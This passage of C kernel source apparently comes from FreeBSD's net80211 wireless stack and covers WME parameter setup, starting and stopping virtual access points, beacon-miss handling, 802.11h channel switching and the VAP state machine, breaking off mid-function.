* Otherwise the hardware is programmed with defaults, not what * the beacon actually announces. */ wme->wme_wmeChanParams.cap_info = 0; /* * Select mode; we can be called early in which case we * always use auto mode. We know we'll be called when * entering the RUN state with bsschan setup properly * so state will eventually get set correctly */ if (ic->ic_bsschan != IEEE80211_CHAN_ANYC) mode = ieee80211_chan2mode(ic->ic_bsschan); else mode = IEEE80211_MODE_AUTO; for (i = 0; i < WME_NUM_AC; i++) { switch (i) { case WME_AC_BK: pPhyParam = &phyParamForAC_BK[mode]; pBssPhyParam = &phyParamForAC_BK[mode]; break; case WME_AC_VI: pPhyParam = &phyParamForAC_VI[mode]; pBssPhyParam = &bssPhyParamForAC_VI[mode]; break; case WME_AC_VO: pPhyParam = &phyParamForAC_VO[mode]; pBssPhyParam = &bssPhyParamForAC_VO[mode]; break; case WME_AC_BE: default: pPhyParam = &phyParamForAC_BE[mode]; pBssPhyParam = &bssPhyParamForAC_BE[mode]; break; } wmep = &wme->wme_wmeChanParams.cap_wmeParams[i]; if (ic->ic_opmode == IEEE80211_M_HOSTAP) { setwmeparams(vap, "chan", i, wmep, pPhyParam); } else { setwmeparams(vap, "chan", i, wmep, pBssPhyParam); } wmep = &wme->wme_wmeBssChanParams.cap_wmeParams[i]; setwmeparams(vap, "bss ", i, wmep, pBssPhyParam); } /* NB: check ic_bss to avoid NULL deref on initial attach */ if (vap->iv_bss != NULL) { /* * Calculate agressive mode switching threshold based * on beacon interval. This doesn't need locking since * we're only called before entering the RUN state at * which point we start sending beacon frames. */ wme->wme_hipri_switch_thresh = (HIGH_PRI_SWITCH_THRESH * vap->iv_bss->ni_intval) / 100; wme->wme_flags &= ~WME_F_AGGRMODE; ieee80211_wme_updateparams(vap); } } void ieee80211_wme_initparams(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; IEEE80211_LOCK(ic); ieee80211_wme_initparams_locked(vap); IEEE80211_UNLOCK(ic); } /* * Update WME parameters for ourself and the BSS. */ void ieee80211_wme_updateparams_locked(struct ieee80211vap *vap) { static const paramType aggrParam[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 2, 4, 10, 64, 0 }, [IEEE80211_MODE_11A] = { 2, 4, 10, 64, 0 }, [IEEE80211_MODE_11B] = { 2, 5, 10, 64, 0 }, [IEEE80211_MODE_11G] = { 2, 4, 10, 64, 0 }, [IEEE80211_MODE_FH] = { 2, 5, 10, 64, 0 }, [IEEE80211_MODE_TURBO_A] = { 1, 3, 10, 64, 0 }, [IEEE80211_MODE_TURBO_G] = { 1, 3, 10, 64, 0 }, [IEEE80211_MODE_STURBO_A] = { 1, 3, 10, 64, 0 }, [IEEE80211_MODE_HALF] = { 2, 4, 10, 64, 0 }, [IEEE80211_MODE_QUARTER] = { 2, 4, 10, 64, 0 }, [IEEE80211_MODE_11NA] = { 2, 4, 10, 64, 0 }, /* XXXcheck*/ [IEEE80211_MODE_11NG] = { 2, 4, 10, 64, 0 }, /* XXXcheck*/ }; struct ieee80211com *ic = vap->iv_ic; struct ieee80211_wme_state *wme = &ic->ic_wme; const struct wmeParams *wmep; struct wmeParams *chanp, *bssp; enum ieee80211_phymode mode; int i; int do_aggrmode = 0; /* * Set up the channel access parameters for the physical * device. First populate the configured settings. 
*/ for (i = 0; i < WME_NUM_AC; i++) { chanp = &wme->wme_chanParams.cap_wmeParams[i]; wmep = &wme->wme_wmeChanParams.cap_wmeParams[i]; chanp->wmep_aifsn = wmep->wmep_aifsn; chanp->wmep_logcwmin = wmep->wmep_logcwmin; chanp->wmep_logcwmax = wmep->wmep_logcwmax; chanp->wmep_txopLimit = wmep->wmep_txopLimit; chanp = &wme->wme_bssChanParams.cap_wmeParams[i]; wmep = &wme->wme_wmeBssChanParams.cap_wmeParams[i]; chanp->wmep_aifsn = wmep->wmep_aifsn; chanp->wmep_logcwmin = wmep->wmep_logcwmin; chanp->wmep_logcwmax = wmep->wmep_logcwmax; chanp->wmep_txopLimit = wmep->wmep_txopLimit; } /* * Select mode; we can be called early in which case we * always use auto mode. We know we'll be called when * entering the RUN state with bsschan setup properly * so state will eventually get set correctly */ if (ic->ic_bsschan != IEEE80211_CHAN_ANYC) mode = ieee80211_chan2mode(ic->ic_bsschan); else mode = IEEE80211_MODE_AUTO; /* * This implements agressive mode as found in certain * vendors' AP's. When there is significant high * priority (VI/VO) traffic in the BSS throttle back BE * traffic by using conservative parameters. Otherwise * BE uses agressive params to optimize performance of * legacy/non-QoS traffic. */ /* Hostap? Only if aggressive mode is enabled */ if (vap->iv_opmode == IEEE80211_M_HOSTAP && (wme->wme_flags & WME_F_AGGRMODE) != 0) do_aggrmode = 1; /* * Station? Only if we're in a non-QoS BSS. */ else if ((vap->iv_opmode == IEEE80211_M_STA && (vap->iv_bss->ni_flags & IEEE80211_NODE_QOS) == 0)) do_aggrmode = 1; /* * IBSS? Only if we we have WME enabled. */ else if ((vap->iv_opmode == IEEE80211_M_IBSS) && (vap->iv_flags & IEEE80211_F_WME)) do_aggrmode = 1; /* * If WME is disabled on this VAP, default to aggressive mode * regardless of the configuration. */ if ((vap->iv_flags & IEEE80211_F_WME) == 0) do_aggrmode = 1; /* XXX WDS? */ /* XXX MBSS? */ if (do_aggrmode) { chanp = &wme->wme_chanParams.cap_wmeParams[WME_AC_BE]; bssp = &wme->wme_bssChanParams.cap_wmeParams[WME_AC_BE]; chanp->wmep_aifsn = bssp->wmep_aifsn = aggrParam[mode].aifsn; chanp->wmep_logcwmin = bssp->wmep_logcwmin = aggrParam[mode].logcwmin; chanp->wmep_logcwmax = bssp->wmep_logcwmax = aggrParam[mode].logcwmax; chanp->wmep_txopLimit = bssp->wmep_txopLimit = (vap->iv_flags & IEEE80211_F_BURST) ? aggrParam[mode].txopLimit : 0; IEEE80211_DPRINTF(vap, IEEE80211_MSG_WME, "update %s (chan+bss) [acm %u aifsn %u logcwmin %u " "logcwmax %u txop %u]\n", ieee80211_wme_acnames[WME_AC_BE], chanp->wmep_acm, chanp->wmep_aifsn, chanp->wmep_logcwmin, chanp->wmep_logcwmax, chanp->wmep_txopLimit); } /* * Change the contention window based on the number of associated * stations. If the number of associated stations is 1 and * aggressive mode is enabled, lower the contention window even * further. 
*/ if (vap->iv_opmode == IEEE80211_M_HOSTAP && ic->ic_sta_assoc < 2 && (wme->wme_flags & WME_F_AGGRMODE) != 0) { static const uint8_t logCwMin[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = 3, [IEEE80211_MODE_11A] = 3, [IEEE80211_MODE_11B] = 4, [IEEE80211_MODE_11G] = 3, [IEEE80211_MODE_FH] = 4, [IEEE80211_MODE_TURBO_A] = 3, [IEEE80211_MODE_TURBO_G] = 3, [IEEE80211_MODE_STURBO_A] = 3, [IEEE80211_MODE_HALF] = 3, [IEEE80211_MODE_QUARTER] = 3, [IEEE80211_MODE_11NA] = 3, [IEEE80211_MODE_11NG] = 3, }; chanp = &wme->wme_chanParams.cap_wmeParams[WME_AC_BE]; bssp = &wme->wme_bssChanParams.cap_wmeParams[WME_AC_BE]; chanp->wmep_logcwmin = bssp->wmep_logcwmin = logCwMin[mode]; IEEE80211_DPRINTF(vap, IEEE80211_MSG_WME, "update %s (chan+bss) logcwmin %u\n", ieee80211_wme_acnames[WME_AC_BE], chanp->wmep_logcwmin); } /* * Arrange for the beacon update. * * XXX what about MBSS, WDS? */ if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS) { /* * Arrange for a beacon update and bump the parameter * set number so associated stations load the new values. */ wme->wme_bssChanParams.cap_info = (wme->wme_bssChanParams.cap_info+1) & WME_QOSINFO_COUNT; ieee80211_beacon_notify(vap, IEEE80211_BEACON_WME); } wme->wme_update(ic); IEEE80211_DPRINTF(vap, IEEE80211_MSG_WME, "%s: WME params updated, cap_info 0x%x\n", __func__, vap->iv_opmode == IEEE80211_M_STA ? wme->wme_wmeChanParams.cap_info : wme->wme_bssChanParams.cap_info); } void ieee80211_wme_updateparams(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; if (ic->ic_caps & IEEE80211_C_WME) { IEEE80211_LOCK(ic); ieee80211_wme_updateparams_locked(vap); IEEE80211_UNLOCK(ic); } } static void parent_updown(void *arg, int npending) { struct ifnet *parent = arg; parent->if_ioctl(parent, SIOCSIFFLAGS, NULL); } static void update_mcast(void *arg, int npending) { struct ieee80211com *ic = arg; struct ifnet *parent = ic->ic_ifp; ic->ic_update_mcast(parent); } static void update_promisc(void *arg, int npending) { struct ieee80211com *ic = arg; struct ifnet *parent = ic->ic_ifp; ic->ic_update_promisc(parent); } static void update_channel(void *arg, int npending) { struct ieee80211com *ic = arg; ic->ic_set_channel(ic); ieee80211_radiotap_chan_change(ic); } static void update_chw(void *arg, int npending) { struct ieee80211com *ic = arg; /* * XXX should we defer the channel width _config_ update until now? */ ic->ic_update_chw(ic); } /* * Block until the parent is in a known state. This is * used after any operations that dispatch a task (e.g. * to auto-configure the parent device up/down). */ void ieee80211_waitfor_parent(struct ieee80211com *ic) { taskqueue_block(ic->ic_tq); ieee80211_draintask(ic, &ic->ic_parent_task); ieee80211_draintask(ic, &ic->ic_mcast_task); ieee80211_draintask(ic, &ic->ic_promisc_task); ieee80211_draintask(ic, &ic->ic_chan_task); ieee80211_draintask(ic, &ic->ic_bmiss_task); ieee80211_draintask(ic, &ic->ic_chw_task); taskqueue_unblock(ic->ic_tq); } /* * Start a vap running. If this is the first vap to be * set running on the underlying device then we * automatically bring the device up. */ void ieee80211_start_locked(struct ieee80211vap *vap) { struct ifnet *ifp = vap->iv_ifp; struct ieee80211com *ic = vap->iv_ic; struct ifnet *parent = ic->ic_ifp; IEEE80211_LOCK_ASSERT(ic); IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE | IEEE80211_MSG_DEBUG, "start running, %d vaps running\n", ic->ic_nrunning); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { /* * Mark us running. 
Note that it's ok to do this first; * if we need to bring the parent device up we defer that * to avoid dropping the com lock. We expect the device * to respond to being marked up by calling back into us * through ieee80211_start_all at which point we'll come * back in here and complete the work. */ ifp->if_drv_flags |= IFF_DRV_RUNNING; /* * We are not running; if this we are the first vap * to be brought up auto-up the parent if necessary. */ if (ic->ic_nrunning++ == 0 && (parent->if_drv_flags & IFF_DRV_RUNNING) == 0) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE | IEEE80211_MSG_DEBUG, "%s: up parent %s\n", __func__, parent->if_xname); parent->if_flags |= IFF_UP; ieee80211_runtask(ic, &ic->ic_parent_task); return; } } /* * If the parent is up and running, then kick the * 802.11 state machine as appropriate. */ if ((parent->if_drv_flags & IFF_DRV_RUNNING) && vap->iv_roaming != IEEE80211_ROAMING_MANUAL) { if (vap->iv_opmode == IEEE80211_M_STA) { #if 0 /* XXX bypasses scan too easily; disable for now */ /* * Try to be intelligent about clocking the state * machine. If we're currently in RUN state then * we should be able to apply any new state/parameters * simply by re-associating. Otherwise we need to * re-scan to select an appropriate ap. */ if (vap->iv_state >= IEEE80211_S_RUN) ieee80211_new_state_locked(vap, IEEE80211_S_ASSOC, 1); else #endif ieee80211_new_state_locked(vap, IEEE80211_S_SCAN, 0); } else { /* * For monitor+wds mode there's nothing to do but * start running. Otherwise if this is the first * vap to be brought up, start a scan which may be * preempted if the station is locked to a particular * channel. */ vap->iv_flags_ext |= IEEE80211_FEXT_REINIT; if (vap->iv_opmode == IEEE80211_M_MONITOR || vap->iv_opmode == IEEE80211_M_WDS) ieee80211_new_state_locked(vap, IEEE80211_S_RUN, -1); else ieee80211_new_state_locked(vap, IEEE80211_S_SCAN, 0); } } } /* * Start a single vap. */ void ieee80211_init(void *arg) { struct ieee80211vap *vap = arg; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE | IEEE80211_MSG_DEBUG, "%s\n", __func__); IEEE80211_LOCK(vap->iv_ic); ieee80211_start_locked(vap); IEEE80211_UNLOCK(vap->iv_ic); } /* * Start all runnable vap's on a device. */ void ieee80211_start_all(struct ieee80211com *ic) { struct ieee80211vap *vap; IEEE80211_LOCK(ic); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { struct ifnet *ifp = vap->iv_ifp; if (IFNET_IS_UP_RUNNING(ifp)) /* NB: avoid recursion */ ieee80211_start_locked(vap); } IEEE80211_UNLOCK(ic); } /* * Stop a vap. We force it down using the state machine * then mark it's ifnet not running. If this is the last * vap running on the underlying device then we close it * too to insure it will be properly initialized when the * next vap is brought up. 
*/ void ieee80211_stop_locked(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = vap->iv_ifp; struct ifnet *parent = ic->ic_ifp; IEEE80211_LOCK_ASSERT(ic); IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE | IEEE80211_MSG_DEBUG, "stop running, %d vaps running\n", ic->ic_nrunning); ieee80211_new_state_locked(vap, IEEE80211_S_INIT, -1); if (ifp->if_drv_flags & IFF_DRV_RUNNING) { ifp->if_drv_flags &= ~IFF_DRV_RUNNING; /* mark us stopped */ if (--ic->ic_nrunning == 0 && (parent->if_drv_flags & IFF_DRV_RUNNING)) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE | IEEE80211_MSG_DEBUG, "down parent %s\n", parent->if_xname); parent->if_flags &= ~IFF_UP; ieee80211_runtask(ic, &ic->ic_parent_task); } } } void ieee80211_stop(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; IEEE80211_LOCK(ic); ieee80211_stop_locked(vap); IEEE80211_UNLOCK(ic); } /* * Stop all vap's running on a device. */ void ieee80211_stop_all(struct ieee80211com *ic) { struct ieee80211vap *vap; IEEE80211_LOCK(ic); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { struct ifnet *ifp = vap->iv_ifp; if (IFNET_IS_UP_RUNNING(ifp)) /* NB: avoid recursion */ ieee80211_stop_locked(vap); } IEEE80211_UNLOCK(ic); ieee80211_waitfor_parent(ic); } /* * Stop all vap's running on a device and arrange * for those that were running to be resumed. */ void ieee80211_suspend_all(struct ieee80211com *ic) { struct ieee80211vap *vap; IEEE80211_LOCK(ic); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { struct ifnet *ifp = vap->iv_ifp; if (IFNET_IS_UP_RUNNING(ifp)) { /* NB: avoid recursion */ vap->iv_flags_ext |= IEEE80211_FEXT_RESUME; ieee80211_stop_locked(vap); } } IEEE80211_UNLOCK(ic); ieee80211_waitfor_parent(ic); } /* * Start all vap's marked for resume. */ void ieee80211_resume_all(struct ieee80211com *ic) { struct ieee80211vap *vap; IEEE80211_LOCK(ic); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { struct ifnet *ifp = vap->iv_ifp; if (!IFNET_IS_UP_RUNNING(ifp) && (vap->iv_flags_ext & IEEE80211_FEXT_RESUME)) { vap->iv_flags_ext &= ~IEEE80211_FEXT_RESUME; ieee80211_start_locked(vap); } } IEEE80211_UNLOCK(ic); } void ieee80211_beacon_miss(struct ieee80211com *ic) { IEEE80211_LOCK(ic); if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { /* Process in a taskq, the handler may reenter the driver */ ieee80211_runtask(ic, &ic->ic_bmiss_task); } IEEE80211_UNLOCK(ic); } static void beacon_miss(void *arg, int npending) { struct ieee80211com *ic = arg; struct ieee80211vap *vap; IEEE80211_LOCK(ic); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { /* * We only pass events through for sta vap's in RUN state; * may be too restrictive but for now this saves all the * handlers duplicating these checks. */ if (vap->iv_opmode == IEEE80211_M_STA && vap->iv_state >= IEEE80211_S_RUN && vap->iv_bmiss != NULL) vap->iv_bmiss(vap); } IEEE80211_UNLOCK(ic); } static void beacon_swmiss(void *arg, int npending) { struct ieee80211vap *vap = arg; struct ieee80211com *ic = vap->iv_ic; IEEE80211_LOCK(ic); if (vap->iv_state == IEEE80211_S_RUN) { /* XXX Call multiple times if npending > zero? */ vap->iv_bmiss(vap); } IEEE80211_UNLOCK(ic); } /* * Software beacon miss handling. Check if any beacons * were received in the last period. If not post a * beacon miss; otherwise reset the counter. */ void ieee80211_swbmiss(void *arg) { struct ieee80211vap *vap = arg; struct ieee80211com *ic = vap->iv_ic; IEEE80211_LOCK_ASSERT(ic); /* XXX sleep state? 
*/ KASSERT(vap->iv_state == IEEE80211_S_RUN, ("wrong state %d", vap->iv_state)); if (ic->ic_flags & IEEE80211_F_SCAN) { /* * If scanning just ignore and reset state. If we get a * bmiss after coming out of scan because we haven't had * time to receive a beacon then we should probe the AP * before posting a real bmiss (unless iv_bmiss_max has * been artifiically lowered). A cleaner solution might * be to disable the timer on scan start/end but to handle * case of multiple sta vap's we'd need to disable the * timers of all affected vap's. */ vap->iv_swbmiss_count = 0; } else if (vap->iv_swbmiss_count == 0) { if (vap->iv_bmiss != NULL) ieee80211_runtask(ic, &vap->iv_swbmiss_task); } else vap->iv_swbmiss_count = 0; callout_reset(&vap->iv_swbmiss, vap->iv_swbmiss_period, ieee80211_swbmiss, vap); } /* * Start an 802.11h channel switch. We record the parameters, * mark the operation pending, notify each vap through the * beacon update mechanism so it can update the beacon frame * contents, and then switch vap's to CSA state to block outbound * traffic. Devices that handle CSA directly can use the state * switch to do the right thing so long as they call * ieee80211_csa_completeswitch when it's time to complete the * channel change. Devices that depend on the net80211 layer can * use ieee80211_beacon_update to handle the countdown and the * channel switch. */ void ieee80211_csa_startswitch(struct ieee80211com *ic, struct ieee80211_channel *c, int mode, int count) { struct ieee80211vap *vap; IEEE80211_LOCK_ASSERT(ic); ic->ic_csa_newchan = c; ic->ic_csa_mode = mode; ic->ic_csa_count = count; ic->ic_flags |= IEEE80211_F_CSAPENDING; TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS || vap->iv_opmode == IEEE80211_M_MBSS) ieee80211_beacon_notify(vap, IEEE80211_BEACON_CSA); /* switch to CSA state to block outbound traffic */ if (vap->iv_state == IEEE80211_S_RUN) ieee80211_new_state_locked(vap, IEEE80211_S_CSA, 0); } ieee80211_notify_csa(ic, c, mode, count); } /* * Complete the channel switch by transitioning all CSA VAPs to RUN. * This is called by both the completion and cancellation functions * so each VAP is placed back in the RUN state and can thus transmit. */ static void csa_completeswitch(struct ieee80211com *ic) { struct ieee80211vap *vap; ic->ic_csa_newchan = NULL; ic->ic_flags &= ~IEEE80211_F_CSAPENDING; TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) if (vap->iv_state == IEEE80211_S_CSA) ieee80211_new_state_locked(vap, IEEE80211_S_RUN, 0); } /* * Complete an 802.11h channel switch started by ieee80211_csa_startswitch. * We clear state and move all vap's in CSA state to RUN state * so they can again transmit. * * Although this may not be completely correct, update the BSS channel * for each VAP to the newly configured channel. The setcurchan sets * the current operating channel for the interface (so the radio does * switch over) but the VAP BSS isn't updated, leading to incorrectly * reported information via ioctl. */ void ieee80211_csa_completeswitch(struct ieee80211com *ic) { struct ieee80211vap *vap; IEEE80211_LOCK_ASSERT(ic); KASSERT(ic->ic_flags & IEEE80211_F_CSAPENDING, ("csa not pending")); ieee80211_setcurchan(ic, ic->ic_csa_newchan); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) if (vap->iv_state == IEEE80211_S_CSA) vap->iv_bss->ni_chan = ic->ic_curchan; csa_completeswitch(ic); } /* * Cancel an 802.11h channel switch started by ieee80211_csa_startswitch. 
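The contract spelled out above can be summarised from a driver's point of view: start the switch with the com lock held, then either let the beacon path run the countdown (ieee80211_beacon_update decrements the CSA count and net80211 completes the switch itself), or, for devices whose firmware runs the countdown, call ieee80211_csa_completeswitch() once the firmware reports completion and a switch is still pending. A sketch; the mydrv_* wrappers are hypothetical, only the net80211 calls come from this file.

static void
mydrv_start_csa(struct ieee80211com *ic, struct ieee80211_channel *c)
{
        IEEE80211_LOCK(ic);
        /* mode 1: stations should stop transmitting until the switch */
        ieee80211_csa_startswitch(ic, c, 1, 10 /* TBTTs until switch */);
        IEEE80211_UNLOCK(ic);
}

static void
mydrv_fw_csa_done(struct ieee80211com *ic)
{
        /* firmware-driven countdown finished; hand control back */
        IEEE80211_LOCK(ic);
        ieee80211_csa_completeswitch(ic);
        IEEE80211_UNLOCK(ic);
}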
* We clear state and move all vap's in CSA state to RUN state * so they can again transmit. */ void ieee80211_csa_cancelswitch(struct ieee80211com *ic) { IEEE80211_LOCK_ASSERT(ic); csa_completeswitch(ic); } /* * Complete a DFS CAC started by ieee80211_dfs_cac_start. * We clear state and move all vap's in CAC state to RUN state. */ void ieee80211_cac_completeswitch(struct ieee80211vap *vap0) { struct ieee80211com *ic = vap0->iv_ic; struct ieee80211vap *vap; IEEE80211_LOCK(ic); /* * Complete CAC state change for lead vap first; then * clock all the other vap's waiting. */ KASSERT(vap0->iv_state == IEEE80211_S_CAC, ("wrong state %d", vap0->iv_state)); ieee80211_new_state_locked(vap0, IEEE80211_S_RUN, 0); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) if (vap->iv_state == IEEE80211_S_CAC) ieee80211_new_state_locked(vap, IEEE80211_S_RUN, 0); IEEE80211_UNLOCK(ic); } /* * Force all vap's other than the specified vap to the INIT state * and mark them as waiting for a scan to complete. These vaps * will be brought up when the scan completes and the scanning vap * reaches RUN state by wakeupwaiting. */ static void markwaiting(struct ieee80211vap *vap0) { struct ieee80211com *ic = vap0->iv_ic; struct ieee80211vap *vap; IEEE80211_LOCK_ASSERT(ic); /* * A vap list entry can not disappear since we are running on the * taskqueue and a vap destroy will queue and drain another state * change task. */ TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { if (vap == vap0) continue; if (vap->iv_state != IEEE80211_S_INIT) { /* NB: iv_newstate may drop the lock */ vap->iv_newstate(vap, IEEE80211_S_INIT, 0); IEEE80211_LOCK_ASSERT(ic); vap->iv_flags_ext |= IEEE80211_FEXT_SCANWAIT; } } } /* * Wakeup all vap's waiting for a scan to complete. This is the * companion to markwaiting (above) and is used to coordinate * multiple vaps scanning. * This is called from the state taskqueue. */ static void wakeupwaiting(struct ieee80211vap *vap0) { struct ieee80211com *ic = vap0->iv_ic; struct ieee80211vap *vap; IEEE80211_LOCK_ASSERT(ic); /* * A vap list entry can not disappear since we are running on the * taskqueue and a vap destroy will queue and drain another state * change task. */ TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { if (vap == vap0) continue; if (vap->iv_flags_ext & IEEE80211_FEXT_SCANWAIT) { vap->iv_flags_ext &= ~IEEE80211_FEXT_SCANWAIT; /* NB: sta's cannot go INIT->RUN */ /* NB: iv_newstate may drop the lock */ vap->iv_newstate(vap, vap->iv_opmode == IEEE80211_M_STA ? IEEE80211_S_SCAN : IEEE80211_S_RUN, 0); IEEE80211_LOCK_ASSERT(ic); } } } /* * Handle post state change work common to all operating modes. */ static void ieee80211_newstate_cb(void *xvap, int npending) { struct ieee80211vap *vap = xvap; struct ieee80211com *ic = vap->iv_ic; enum ieee80211_state nstate, ostate; int arg, rc; IEEE80211_LOCK(ic); nstate = vap->iv_nstate; arg = vap->iv_nstate_arg; if (vap->iv_flags_ext & IEEE80211_FEXT_REINIT) { /* * We have been requested to drop back to the INIT before * proceeding to the new state. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s arg %d\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[IEEE80211_S_INIT], arg); vap->iv_newstate(vap, IEEE80211_S_INIT, arg); IEEE80211_LOCK_ASSERT(ic); vap->iv_flags_ext &= ~IEEE80211_FEXT_REINIT; } ostate = vap->iv_state; if (nstate == IEEE80211_S_SCAN && ostate != IEEE80211_S_INIT) { /* * SCAN was forced; e.g. on beacon miss. Force other running * vap's to INIT state and mark them as waiting for the scan to * complete. 
This insures they don't interfere with our * scanning. Since we are single threaded the vaps can not * transition again while we are executing. * * XXX not always right, assumes ap follows sta */ markwaiting(vap); } IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s arg %d\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate], arg); rc = vap->iv_newstate(vap, nstate, arg); IEEE80211_LOCK_ASSERT(ic); vap->iv_flags_ext &= ~IEEE80211_FEXT_STATEWAIT; if (rc != 0) { /* State transition failed */ KASSERT(rc != EINPROGRESS, ("iv_newstate was deferred")); KASSERT(nstate != IEEE80211_S_INIT, ("INIT state change failed")); IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s returned error %d\n", __func__, ieee80211_state_name[nstate], rc); goto done; } /* No actual transition, skip post processing */ if (ostate == nstate) goto done; if (nstate == IEEE80211_S_RUN) { /* * OACTIVE may be set on the vap if the upper layer * tried to transmit (e.g. IPv6 NDP) before we reach * RUN state. Clear it and restart xmit. * * Note this can also happen as a result of SLEEP->RUN * (i.e. coming out of power save mode). */ vap->iv_ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; /* * XXX TODO Kick-start a VAP queue - this should be a method! */ /* bring up any vaps waiting on us */ wakeupwaiting(vap); } else if (nstate == IEEE80211_S_INIT) { /* * Flush the scan cache if we did the last scan (XXX?) * and flush any frames on send queues from this vap. * Note the mgt q is used only for legacy drivers and * will go away shortly. */ ieee80211_scan_flush(vap); /* * XXX TODO: ic/vap queue flush */ } done: IEEE80211_UNLOCK(ic); } /* * Public interface for initiating a state machine change. * This routine single-threads the request and coordinates * the scheduling of multiple vaps for the purpose of selecting * an operating channel. Specifically the following scenarios * are handled: * o only one vap can be selecting a channel so on transition to * SCAN state if another vap is already scanning then * mark the caller for later processing and return without * doing anything (XXX? expectations by caller of synchronous operation) * o only one vap can be doing CAC of a channel so on transition to * CAC state if another vap is already scanning for radar then * mark the caller for later processing and return without * doing anything (XXX? expectations by caller of synchronous operation) * o if another vap is already running when a request is made * to SCAN then an operating channel has been chosen; bypass * the scan and just join the channel * * Note that the state change call is done through the iv_newstate * method pointer so any driver routine gets invoked. The driver * will normally call back into operating mode-specific * ieee80211_newstate routines (below) unless it needs to completely * bypass the state machine (e.g. because the firmware has it's * own idea how things should work). Bypassing the net80211 layer * is usually a mistake and indicates lack of proper integration * with the net80211 layer. */ int ieee80211_new_state_locked(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211vap *vp; enum ieee80211_state ostate; int nrunning, nscanning; IEEE80211_LOCK_ASSERT(ic); if (vap->iv_flags_ext & IEEE80211_FEXT_STATEWAIT) { if (vap->iv_nstate == IEEE80211_S_INIT) { /* * XXX The vap is being stopped, do no allow any other * state changes until this is completed. 
*/ return -1; } else if (vap->iv_state != vap->iv_nstate) { #if 0 /* Warn if the previous state hasn't completed. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: pending %s -> %s transition lost\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[vap->iv_nstate]); #else /* XXX temporarily enable to identify issues */ if_printf(vap->iv_ifp, "%s: pending %s -> %s transition lost\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[vap->iv_nstate]); #endif } } nrunning = nscanning = 0; /* XXX can track this state instead of calculating */ TAILQ_FOREACH(vp, &ic->ic_vaps, iv_next) { if (vp != vap) { if (vp->iv_state >= IEEE80211_S_RUN) nrunning++; /* XXX doesn't handle bg scan */ /* NB: CAC+AUTH+ASSOC treated like SCAN */ else if (vp->iv_state > IEEE80211_S_INIT) nscanning++; } } ostate = vap->iv_state; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s (nrunning %d nscanning %d)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate], nrunning, nscanning); switch (nstate) { case IEEE80211_S_SCAN: if (ostate == IEEE80211_S_INIT) { /* * INIT -> SCAN happens on initial bringup. */ KASSERT(!(nscanning && nrunning), ("%d scanning and %d running", nscanning, nrunning)); if (nscanning) { /* * Someone is scanning, defer our state * change until the work has completed. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: defer %s -> %s\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); vap->iv_flags_ext |= IEEE80211_FEXT_SCANWAIT; return 0; } if (nrunning) { /* * Someone is operating; just join the channel * they have chosen. */ /* XXX kill arg? */ /* XXX check each opmode, adhoc? */ if (vap->iv_opmode == IEEE80211_M_STA) nstate = IEEE80211_S_SCAN; else nstate = IEEE80211_S_RUN; #ifdef IEEE80211_DEBUG if (nstate != IEEE80211_S_SCAN) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: override, now %s -> %s\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); } #endif } } break; case IEEE80211_S_RUN: if (vap->iv_opmode == IEEE80211_M_WDS && (vap->iv_flags_ext & IEEE80211_FEXT_WDSLEGACY) && nscanning) { /* * Legacy WDS with someone else scanning; don't * go online until that completes as we should * follow the other vap to the channel they choose. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: defer %s -> %s (legacy WDS)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); vap->iv_flags_ext |= IEEE80211_FEXT_SCANWAIT; return 0; } if (vap->iv_opmode == IEEE80211_M_HOSTAP && IEEE80211_IS_CHAN_DFS(ic->ic_bsschan) && (vap->iv_flags_ext & IEEE80211_FEXT_DFS) && !IEEE80211_IS_CHAN_CACDONE(ic->ic_bsschan)) { /* * This is a DFS channel, transition to CAC state * instead of RUN. This allows us to initiate * Channel Availability Check (CAC) as specified * by 11h/DFS. */ nstate = IEEE80211_S_CAC; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, 